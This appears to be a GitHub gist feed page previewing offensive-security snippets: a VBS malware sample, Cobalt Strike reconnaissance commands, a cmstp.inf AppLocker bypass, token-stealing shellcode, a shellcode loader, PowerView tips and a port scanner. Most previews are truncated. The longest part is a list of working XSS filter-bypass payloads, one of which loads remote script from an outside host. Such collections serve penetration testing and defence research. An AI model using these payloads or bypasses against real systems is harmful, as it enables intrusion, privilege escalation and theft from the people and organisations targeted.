Skip to content

Instantly share code, notes, and snippets.

View padovah4ck's full-sized avatar

chris padovah4ck

186 followers · 0 following
View GitHub Profile
@JohnLaTwC
JohnLaTwC / fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
Created October 20, 2018 00:20
VBS
## Uploaded by @JohnLaTwC
## Sample hash: fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
On Error Resume Next
Dim objShell : Set objShell = CreateObject("WScript.Shell")
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
For Each vArg In WScript.Arguments
sArgs = sArgs & " """ & vArg & """"
Next
objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit")
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@NickTyrer
NickTyrer / cmstp.inf
Last active January 5, 2024 13:16
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@hugsy
hugsy / win81-token-stealing-shellcode.asm
Last active March 5, 2021 16:31
Token stealing shellcode for Windows 8.1 x64
;;
;; Token stealing shellcode for Windows 8.1 x64
;;
;; Save the current context on the stack
push rax
push rbx
push rcx
;; Get the current process
@jonlabelle
jonlabelle / ConsolePortScanner.cs
Created July 1, 2017 20:09
Simple async C# Open Port Network Scanner
using System;
using System.Threading.Tasks;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Diagnostics;
using System.Net.Sockets;
namespace ConsolePortScanner
{
class MainClass
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active July 22, 2024 11:58
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@netbiosX
netbiosX / Shellcode.cs
Created June 6, 2017 00:22
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active July 27, 2024 11:22
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@stevenswafford
stevenswafford / google-dorks
Created June 6, 2015 05:57
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!